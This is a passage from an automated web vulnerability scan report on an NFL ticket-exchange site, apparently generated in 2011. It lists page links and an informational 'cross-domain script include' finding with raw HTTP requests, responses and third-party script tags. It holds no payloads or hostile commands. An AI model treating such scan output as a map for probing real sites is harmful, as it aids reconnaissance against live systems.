       <a href="http://www.nfl.com/"><img alt="NFL Logo link to home page" src="http://static.nfl.com/static/site/img/global/alt/large-logo.png" /></a>
   </div>
   <!-- navigation goes here -->
   <script type="text/javascript" src="http://www.nfl.com/widget/partner/includes"></script>
...[SNIP]...
<p style="font:11px arial; margin-top:10px;">To see this content please go to <a href="http://www.adobe.com/go/getflash" target="_blank">Adobe.com to download the latest version of Flash Player</a>
...[SNIP]...
<noscript>
       <a href="http://ad.doubleclick.net/jump/nfl.partner/partner/template;s1=partner;s2=template;slot=top;url=partner_template;nfl=ad;!category=;kw=;tile=#{tile};test=;sz=728x90" target="_blank">
           <img class="adImg" src="http://ad.doubleclick.net/ad/nfl.partner/partner/template;s1=partner;s2=template;slot=top;url=partner_template;nfl=ad;!category=;kw=;tile=#{tile};test=;sz=728x90" width="" height="" border="0" alt=""/>
       </a>
...[SNIP]...
<br>
       <img src="http://content.ticketsnow.com/graphics/NFL/header/generic_header_980x88.GIF" border="0" />
<a href="javascript:void(0)"onclick="window.open('http://www.ticketexchangebyticketmaster.com/NFL/Ticket_Exchange_NFL_Guarantee.html','Guarantee','height=370, width=300,scrollbars=no')"><img src="http://content.ticketsnow.com/graphics/NFL/nfl_ticketexchange2011_728x80.jpg" alt="Guarantee" border="0"></a>
...[SNIP]...
<div class="padV10">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/afc_logo.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_ravens.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_bengals.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_browns.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_steelers.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_bills.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_dolphins.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_patriots.gif" /></div>
...[SNIP]...
<br />

<a href="https://teamexchange.ticketmaster.com/html/eventlist.htmI?l=EN&team=patriots&EVNT=EFP1213&CNTX=">

Find Tickets &raquo;</a>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_jets.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_texans.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_colts.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_jaguars.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_titans.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_broncos.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_chiefs.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_raiders.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_chargers.gif" /></div>
...[SNIP]...
<div class="padV10">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/nfc_logo.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_bears.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_lions.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_packers.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_vikings.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_cowboys.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_giants.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_eagles.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_redskins.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">
<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_falcons.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_panthers.gif" /></div>
...[SNIP]...
<br />

<a href='https://teamexchange.ticketmaster.com/html/eventlist.htmI?l=EN&amp;team=panthers&amp;brand=nfl"'>Find Tickets &raquo;</a>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_saints.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_bucs.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_cardinals.gif" /></div>
...[SNIP]...
<br />

<a href="https://teamexchange.ticketmaster.com/html/eventlist.htmI?l=EN&team=cardinalsnfl">

Find Tickets &raquo;</a>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_49ers.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_seahawks.gif" /></div>
...[SNIP]...
<div class="floatLeft teamLogo">

<img alt="" src="http://content.ticketsnow.com/graphics/nfl/logo_rams.gif" /></div>
...[SNIP]...
<div id="footer-logo">
<a href="http://www.nfl.com/">
<img alt="NFL Logo" src="http://img.static.nfl.com/static/site/img/global/nfl-logo-footer-2010.png" />&nbsp;</a>
...[SNIP]...
<li><a href="http://nflrush.com/?campaign=NFL_footer" target="_blank">NFL Rush</a> |
<a href="http://www.nflrush.com/play60">PLAY 60</a>
...[SNIP]...
<li><a href="http://www.nflyouthpd.com/" target="_blank">NFL Youth Tackle</a>
...[SNIP]...
<li><a href="http://www.usafootball.com" target="_blank">USA Football</a>
...[SNIP]...
<li><a href="http://www.nfl.com/international">NFL International</a>
...[SNIP]...
<li><a href="http://www.nflonlocation.net" target="_blank">NFL On Location</a>
...[SNIP]...
<li><a href="http://www.nfl.com/rulebook" target="_blank">Rulebook</a>
...[SNIP]...
<li><a href="http://www.nfl.com/contact-us">Contact Us</a> | <a href="http://www.nfl.com/help/faq">
FAQ</a>
...[SNIP]...
<li>Jobs: <a href="http://www.nfl.apply2jobs.com/" target="_blank">League</a> | <a
href="http://footballjobs.teamworkonline.com/teamwork/jobs/default.cfm" target="_blank">

Team</a>
...[SNIP]...
<li><a href="http://chalktalk.nfl.com/" target="_blank">Product Blog</a> | <a href="http://www.nfl.com/news/author?id=09000d5d8142ac0e"
target="_blank">
PR</a>
...[SNIP]...
<li><a href="http://www.nflshop.com/entry.point?target=z&source=NFL_SHOP_TAB_BOTTOM_BANNER"
target="_blank">
NFL Shop</a>
...[SNIP]...
<li><a href="http://www.nfl.com/static/content/catch_all/nfl_generic_content/media-kit-2010.pdf">
Media Kit (PDF)</a>
...[SNIP]...
<li><a href="http://profootballhof.com" target="_blank">Profootballhof.com</a>
...[SNIP]...
<li><a href="http://www.nfllabor.com" target="_blank">NFLLabor.com</a>
...[SNIP]...
<li><a href="http://www.jointheteam.com/" target="_blank">In The Community</a>
...[SNIP]...
<li><a href="http://nflplayers.com" target="_blank">NFLPlayers.com</a>
...[SNIP]...
<li><a href="https://www.nflplayercare.com/" target="_blank">NFL Player Care</a>
...[SNIP]...
<li><a href="http://www.nfl.com/playerdevelopment/overview" target="_blank">Player Development</a>
...[SNIP]...
<li><a href="http://www.buffalobills.com/" target="_blank">Bills</a>
...[SNIP]...
<li><a href="http://www.miamidolphins.com/" target="_blank">Dolphins</a>
...[SNIP]...
<li><a href="http://www.patriots.com/" target="_blank">Patriots</a>
...[SNIP]...
<li><a href="http://www.newyorkjets.com/" target="_blank">Jets</a>
...[SNIP]...
<li><a href="http://www.baltimoreravens.com/" target="_blank">Ravens</a>
...[SNIP]...
<li><a href="http://www.bengals.com/" target="_blank">Bengals</a>
...[SNIP]...
<li><a href="http://www.clevelandbrowns.com/" target="_blank">Browns</a>
...[SNIP]...
<li><a href="http://www.steelers.com/" target="_blank">Steelers</a>
...[SNIP]...
<li><a href="http://www.houstontexans.com/" target="_blank">Texans</a>
...[SNIP]...
<li><a href="http://www.colts.com/" target="_blank">Colts</a>
...[SNIP]...
<li><a href="http://www.jaguars.com/" target="_blank">Jaguars</a>
...[SNIP]...
<li><a href="http://www.titansonline.com/" target="_blank">Titans</a>
...[SNIP]...
<li><a href="http://www.denverbroncos.com/" target="_blank">Broncos</a>
...[SNIP]...
<li><a href="http://www.kcchiefs.com/" target="_blank">Chiefs</a>
...[SNIP]...
<li><a href="http://www.raiders.com/" target="_blank">Raiders</a>
...[SNIP]...
<li><a href="http://www.chargers.com/" target="_blank">Chargers</a>
...[SNIP]...
<li><a href="http://www.dallascowboys.com/" target="_blank">Cowboys</a>
...[SNIP]...
<li><a href="http://www.giants.com/" target="_blank">Giants</a>
...[SNIP]...
<li><a href="http://www.philadelphiaeagles.com/" target="_blank">Eagles</a>
...[SNIP]...
<li><a href="http://www.redskins.com/" target="_blank">Redskins</a>
...[SNIP]...
<li><a href="http://www.chicagobears.com/" target="_blank">Bears</a>
...[SNIP]...
<li><a href="http://www.detroitlions.com/" target="_blank">Lions</a>
...[SNIP]...
<li><a href="http://www.packers.com/" target="_blank">Packers</a>
...[SNIP]...
<li><a href="http://www.vikings.com/" target="_blank">Vikings</a>
...[SNIP]...
<li><a href="http://www.atlantafalcons.com/" target="_blank">Falcons</a>
...[SNIP]...
<li><a href="http://www.panthers.com/" target="_blank">Panthers</a>
...[SNIP]...
<li><a href="http://www.neworleanssaints.com/" target="_blank">Saints</a>
...[SNIP]...
<li><a href="http://www.buccaneers.com/" target="_blank">Buccaneers</a>
...[SNIP]...
<li><a href="http://www.azcardinals.com/" target="_blank">Cardinals</a>
...[SNIP]...
<li><a href="http://www.stlouisrams.com/" target="_blank">Rams</a>
...[SNIP]...
<li><a href="http://www.sf49ers.com/" target="_blank">49ers</a>
...[SNIP]...
<li><a href="http://www.seahawks.com/" target="_blank">Seahawks</a>
...[SNIP]...
signs are registered
trademarks of the teams indicated. All other NFL-related trademarks are trademarks
of the National Football League. NFL footage &copy; NFL Productions LLC. <a href="http://www.nfl.com/help/privacy"
style="color: #b6061e; font-weight:normal;">
PRIVACY POLICY</a> | <a href="http://www.nfl.com/help/terms"
style="color: #b6061e; font-weight:normal;">
Terms & Conditions</a>
...[SNIP]...
</div>
<a rel="entry-content" href="http://www.nfl.com/ie/web-slice" style="display: none;">
</a><a rel="bookmark" target="_blank" href="http://www.nfl.com" style="display: none;">
</a>
...[SNIP]...
<div>
<img alt="DCSIMG" id="DCSIMG" width="1" height="1"
src="https://statse.webtrendslive.com/dcshdeee310000ggb8or3iuq2_1s8q/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/>

</div>
...[SNIP]...
</script><script language="javascript" src="http://track.roiservice.com/track/track.aspx?roiid=938956107000029" ></script>
...[SNIP]...
</script>
<img src="http://www.ticketsnow2.com/rep.asp?id=16068" /><script language="JavaScript">
...[SNIP]...
</script><script src='http://content.ticketsnow.com/scripts/Omniture/s_code.js' type='text/javascript'></script>
...[SNIP]...
<!-- End SiteCatalyst Code -->

       <iframe src="http://switch.atdmt.com/iaction/dnrtix_LandingPageNetwrkReTargetingActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

5. Cross-domain script include  previous
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


5.1. http://www.ticketexchangebyticketmaster.com/NFL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /NFL/ HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568291#49f8186e-449e-42b4-aa0f-9cc8833f240e; expires=Sun, 03-Jun-2012 01:27:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/prototype-1.6.0.3.js"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/scriptaculous-1.8.1/scriptaculous.js?load=effects"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/swfobject.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/polls.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global-alt.js"
type="text/javascript">
</script>
...[SNIP]...
<meta name="msvalidate.01" content="961067BFAEA8C40F29C816E73EF9B1E5" /><script src="http://content.ticketsnow.com/scripts/WebTrend/LibScriptBlock.js" type="text/javascript"></script>
...[SNIP]...
<link href="http://content.ticketsnow.com/Css/PowerSearch/CalendarBox.css" type="text/css" rel="stylesheet" />

           <script src="http://content.ticketsnow.com/scripts/Master/TNow3Master.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/master/common.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/ExactTarget/Tracking.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/Master/CalendarBox.js" type="text/javascript"></script>
...[SNIP]...
<!-- navigation goes here -->
   <script type="text/javascript" src="http://www.nfl.com/widget/partner/includes"></script>
...[SNIP]...
</noscript>

<script language="javascript" src="http://track.roiservice.com/track/track.aspx?roiid=938956107000029" ></script>
...[SNIP]...
</script><script src='http://content.ticketsnow.com/scripts/Omniture/s_code.js' type='text/javascript'></script>
...[SNIP]...

5.2. http://www.ticketexchangebyticketmaster.com/NFL/default.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ticketexchangebyticketmaster.com
Path:   /NFL/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /NFL/default.aspx HTTP/1.1
Host: www.ticketexchangebyticketmaster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 03 Jun 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: TNOW3SessionCookie=1129568319#16fbc45d-3a18-4c7d-b7a7-9cd7fdcf95cc; expires=Sun, 03-Jun-2012 01:27:02 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="hdTicketExchange">
...[SNIP]...
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/prototype-1.6.0.3.js"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/scriptaculous-1.8.1/scriptaculous.js?load=effects"
type="text/javascript">
</script>

<script src="http://static.nfl.com/static/site/scripts/lib/swfobject.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/polls.js" type="text/javascript"></script>

<script src="http://static.nfl.com/static/site/scripts/redesign/nfl.global-alt.js"
type="text/javascript">
</script>
...[SNIP]...
<meta name="msvalidate.01" content="961067BFAEA8C40F29C816E73EF9B1E5" /><script src="http://content.ticketsnow.com/scripts/WebTrend/LibScriptBlock.js" type="text/javascript"></script>
...[SNIP]...
<link href="http://content.ticketsnow.com/Css/PowerSearch/CalendarBox.css" type="text/css" rel="stylesheet" />

           <script src="http://content.ticketsnow.com/scripts/Master/TNow3Master.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/master/common.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/ExactTarget/Tracking.js" type="text/javascript"></script>

           <script src="http://content.ticketsnow.com/scripts/Master/CalendarBox.js" type="text/javascript"></script>
...[SNIP]...
<!-- navigation goes here -->
   <script type="text/javascript" src="http://www.nfl.com/widget/partner/includes"></script>
...[SNIP]...
</noscript>

<script language="javascript" src="http://track.roiservice.com/track/track.aspx?roiid=938956107000029" ></script>
...[SNIP]...
</script><script src='http://content.ticketsnow.com/scripts/Omniture/s_code.js' type='text/javascript'></script>
...[SNIP]...

Report generated by XSS.CX at Sun Jun 05 06:56:00 CDT 2011.